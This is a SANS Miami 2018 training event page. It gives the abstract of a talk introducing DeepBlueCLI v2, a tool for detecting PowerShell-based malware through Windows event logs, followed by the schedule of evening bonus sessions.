Last week to get a GIAC Certification Attempt Included with Online Training - Ends Soon!

Miami 2018

Miami, FL | Mon, Jan 29, 2018 - Sat, Feb 3, 2018
Event starts in 102 Days
 

Introducing DeepBlueCLI v2, now ported to Python and ELK

  • Eric Conrad
  • Tuesday, January 30th, 7:15pm - 8:15pm

Recent malware attacks leverage PowerShell for post exploitation. Why? No EXE for antivirus or HIPS to squash, nothing saved to the filesystem, sites that use application whitelisting allow PowerShell, and little to no default logging.

Event logs continue to be the best source to centrally hunt malice in a Windows environment. Virtually all malware may be detected (including the latest PowerShell-fueled post exploitation) via event logs, after making small tweaks the logging configuration. DeepBlueCLI will go toe-to-toe with the latest attacks: this talk will explore the evidence malware leaves behind, leveraging Windows command line auditing (now natively available in Windows 7+) and PowerShell logging.


Bonus Sessions

The following bonus sessions are open to all paid attendees at no additional cost. There are many different types of events that fall into these categories:

  • SANS@Night: Evening presentations given after day courses have ended. This category includes Keynotes.
  • Special Events: SANS-hosted events and other non-technical recreational offerings. This category includes, but is not limited to, Receptions and Information Tables.
Monday, January 29
Session Speaker Time Type
General Session - Welcome to SANS Eric Conrad Monday, January 29th, 8:00am - 8:30am Special Events
Welcome Threat Hunters, Phishermen, and Other Liars Rob Lee Monday, January 29th, 7:15pm - 9:15pm Keynote
Tuesday, January 30
Session Speaker Time Type
Introducing DeepBlueCLI v2, now ported to Python and ELK Eric Conrad Tuesday, January 30th, 7:15pm - 8:15pm SANS@Night
Adversary Simulations - Taking Attack Models and Penetration Testing to the Next Level Jorge Orchilles Tuesday, January 30th, 8:15pm - 9:15pm SANS@Night
Wednesday, January 31
Session Speaker Time Type
Real World incidents and threats to Critical Infrastructure Mark Bristow Wednesday, January 31st, 7:15pm - 8:15pm SANS@Night
Finance Fundamentals: Building the Business Case for Security Robert Kirtley Wednesday, January 31st, 8:15pm - 9:15pm SANS@Night
Thursday, February 1
Session Speaker Time Type
Infosec Rock Star: Geek Will Only Get You So Far Ted Demopoulos Thursday, February 1st, 7:15pm - 8:15pm SANS@Night